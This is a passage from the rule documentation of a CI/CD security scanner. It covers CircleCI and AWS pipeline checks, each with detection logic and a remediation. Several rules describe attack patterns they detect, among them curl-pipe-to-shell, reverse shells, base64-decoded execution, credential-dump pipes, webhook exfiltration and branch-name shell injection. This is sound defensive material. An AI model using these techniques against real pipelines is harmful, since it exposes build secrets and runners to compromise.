Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.

Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.

Source: CC-002 in the CircleCI provider.

CC-003: Docker image not pinned by digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.

Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable, a registry compromise or upstream push silently replaces the image content.

Source: CC-003 in the CircleCI provider.

CC-004: Secret-like environment variable not managed via context MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's context restrictions, security groups, OIDC claims, and audit logs are only enforced when secrets live in contexts.

Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.

Source: CC-004 in the CircleCI provider.

CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.

Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-005 in the CircleCI provider.

CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.

Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.

Source: CC-006 in the CircleCI provider.

CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.

Recommendation. Add an SBOM generation step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.

Source: CC-007 in the CircleCI provider.

CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.

Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: CC-008 in the CircleCI provider.

CC-009: Deploy job missing manual approval gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.

Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.

Source: CC-009 in the CircleCI provider.

CC-010: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted', if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.

Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.

Source: CC-010 in the CircleCI provider.

CC-011: No store_test_results step (test results not archived) LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.

Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.

Source: CC-011 in the CircleCI provider.

CC-012: Dynamic config via setup: true enables code injection MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.

Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.

Source: CC-012 in the CircleCI provider.

CC-013: Deploy job in workflow has no branch filter MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.

Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).

Source: CC-013 in the CircleCI provider.

CC-014: Job missing resource_class declaration MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.

Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.

Source: CC-014 in the CircleCI provider.

CC-015: No no_output_timeout configured MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.

Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable default is 10-30 minutes. CircleCI's default of 10 minutes may be too long for some pipelines and absent for others.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-015 in the CircleCI provider.

CC-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: CC-016 in the CircleCI provider.

CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-017 in the CircleCI provider.

CC-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-018 in the CircleCI provider.

CC-019: add_ssh_keys without fingerprint restriction HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege, the job gains access to keys it does not need, increasing the blast radius if the job is compromised.

Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.

Source: CC-019 in the CircleCI provider.

CC-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: CC-020 in the CircleCI provider.

CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-021 in the CircleCI provider.

CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: CC-022 in the CircleCI provider.

CC-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-023 in the CircleCI provider.

CC-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Signing (cosign sign) binds identity to bytes; attestation (cosign attest) binds a structured claim about how the artifact was built. SLSA verifiers check the latter so consumers can enforce builder/source/parameter policies.

Recommendation. Add a run: cosign attest command against a provenance.intoto.jsonl statement, or use the circleci/attestation orb. CC-006 covers signing; this rule covers the build-provenance step SLSA Build L3 requires.

Source: CC-024 in the CircleCI provider.

CC-025: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CircleCI's restore_cache falls through each listed key until it finds a hit. When one of those keys is derived from CIRCLE_BRANCH, CIRCLE_TAG, or CIRCLE_PR_*, values an attacker can set by opening a PR, the attacker can plant a cache entry that a protected job later uses. Uses checksum-of-lockfile or a static version label instead.

Recommendation. Derive save_cache and restore_cache keys from values the attacker can't control, the lockfile checksum ({{ checksum "package-lock.json" }}) and the build variant, not {{ .Branch }} or ${CIRCLE_PR_NUMBER}. A PR-scoped branch can seed a poisoned cache entry that a later main-branch run restores as trusted.

Source: CC-025 in the CircleCI provider.

CC-026: Config contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on concrete indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, credential-dump pipes, history-erasure).

Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any contexts/env vars the pipeline can reach, and audit recent CircleCI runs for outbound traffic to the matched hosts.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: CC-026 in the CircleCI provider.

CC-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements CC-002 (script injection from untrusted context). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: CC-027 in the CircleCI provider.

CC-028: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements CC-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: CC-028 in the CircleCI provider.

CC-029: Machine executor image not pinned HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. CC-003 covers Docker images declared under docker: blocks. It does not reach the machine executor, where the image is on machine.image. A rolling tag (current, edge, default) pulls a fresh image whenever CircleCI publishes one, reintroducing the same supply-chain risk Docker-image pinning is designed to eliminate.

Recommendation. Pin every machine.image to a dated release tag, ubuntu-2204:2024.05.1 rather than :current, :edge, :default, or a bare image name. CircleCI rotates the current / edge aliases on its own cadence, so builds re-run on an image the author never reviewed.

Source: CC-029 in the CircleCI provider.

CC-030: Workflow job uses context without branch filter or approval gate MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. CircleCI contexts are the recommended way to store shared secrets, but binding a context to a job is only half of least-privilege, the other half is controlling when the binding activates. Unrestricted workflow entries with context: turn every branch push into a secret-read event.

Recommendation. Either add filters.branches.only: [<protected branches>] to restrict when the context-bound job runs, or require a type: approval job in requires: so a human gates the secret-carrying execution. Without either gate, every push to the project loads the context's secrets into an ephemeral runner where any compromised step can exfiltrate them.

Source: CC-030 in the CircleCI provider.

CC-031: OIDC role assumption without branch filter or approval gate HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the CircleCI-side workflow can't drive the role assumption from any branch. Distinct from CC-030 (broad context binding, MEDIUM); CC-031 narrows to OIDC role assumption and is HIGH because role-bound credentials reach further than the project-scoped secrets in a context.

Recommendation. Restrict every workflow job that passes a cloud role_arn (or equivalent OIDC parameter) to a protected branch list, or require a type: approval predecessor. Without either gate, any push triggers a cloud-role assumption with the full blast radius of the IdP-side trust policy.

Source: CC-031 in the CircleCI provider.

CCM-000: CodeCommit API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CCM-000 in the AWS provider.

CCM-001: CodeCommit repository has no approval rule template attached HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.

Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.

Source: CCM-001 in the AWS provider.

CCM-002: CodeCommit repository not encrypted with customer KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Same shape as CA-001 / ECR-005 / S3 default encryption: the AWS-owned default key keeps the key policy under AWS, removing your ability to scope or audit Decrypt operations. Source code in the repo deserves the same key-policy + CloudTrail story you'd apply to artifacts in S3.

Recommendation. Recreate the repository with a kmsKeyId argument pointing at a customer-managed KMS key. CodeCommit encryption is set at creation and cannot be changed afterwards.

Source: CCM-002 in the AWS provider.

CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.

Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.

Source: CCM-003 in the AWS provider.

CD-000: CodeDeploy API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CD-000 in the AWS provider.

CD-001: Automatic rollback on failure not enabled MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out, deployments fail-open, not fail-back.

Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.

Source: CD-001 in the AWS provider.

CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.

Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.

Source: CD-002 in the AWS provider.

CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.

Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.

Source: CD-003 in the AWS provider.

CF-001: Inline credential parameter on a CloudFormation resource HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-001 in the CloudFormation provider.

CF-002: CloudFormation parameter declares a default secret value HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-002 in the CloudFormation provider.

CF-003: CloudFormation resource opens a 0.0.0.0/0 ingress HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. See CloudFormation provider documentation for the rule's detection mechanism.

Recommendation. See CloudFormation provider documentation for the recommended remediation.

Source: CF-003 in the CloudFormation provider.

CP-000: CodePipeline API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CP-000 in the AWS provider.

CP-001: No approval action before deploy stages HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point, combine with CP-005 for production-tagged stages specifically.

Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.

Source: CP-001 in the AWS provider.

CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.

Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.

Source: CP-002 in the AWS provider.

CP-003: Source stage using polling instead of event-driven trigger LOW

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.

Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.

Known false positives.

  • PollForSourceChanges=true is the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.

Source: CP-003 in the AWS provider.

CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.

Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.

Source: CP-004 in the AWS provider.

CP-005: Production Deploy stage has no preceding ManualApproval MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. The complement to CP-001: this rule fires only on stages whose name contains prod / production / live. Even teams that intentionally skip approvals for dev / staging deploys usually want a human in the loop for a production-tagged target.

Recommendation. Add a Manual approval action immediately before any stage whose name contains prod / production. CP-001 covers the generic case; this rule specifically looks at production-tagged stages where the blast radius of an unreviewed deploy is largest.

Source: CP-005 in the AWS provider.

CP-007: CodePipeline v2 PR trigger accepts all branches HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. V2 pipelines added native PR triggers; without a branches.includes filter, any PR, including fork PRs from outside the org, fires the pipeline. The build stage runs with whatever IAM authority the pipeline's role carries, which is the full attack surface a fork-PR compromise can reach.

Recommendation. On V2 pipelines, add an includes filter under the trigger's branches block (and optionally pullRequest.events) so only PRs targeting specific branches run. Without a filter, any fork-PR can execute the pipeline's build and deploy stages.

Source: CP-007 in the AWS provider.

CT-000: CloudTrail API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CT-000 in the AWS provider.

CT-001: No active CloudTrail trail in region HIGH

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.

Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.

Source: CT-001 in the AWS provider.

CT-002: CloudTrail log-file validation disabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.

Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.

Source: CT-002 in the AWS provider.

CT-003: CloudTrail trail is not multi-region MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.

Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region, an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.

Source: CT-003 in the AWS provider.

CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically, the alarm is the missing fan-out.

Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.

Source: CW-001 in the AWS provider.

CWL-000: CloudWatch Logs API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CWL-000 in the AWS provider.

CWL-001: CodeBuild log group has no retention policy LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.

Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.

Source: CWL-001 in the AWS provider.

CWL-002: CodeBuild log group not KMS-encrypted MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. CloudWatch Logs default encryption is service-managed, fine for confidentiality, but no audit trail or scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.

Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.

Source: CWL-002 in the AWS provider.

DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too, only an explicit @sha256: survives, since the tag is mutable on the registry side.

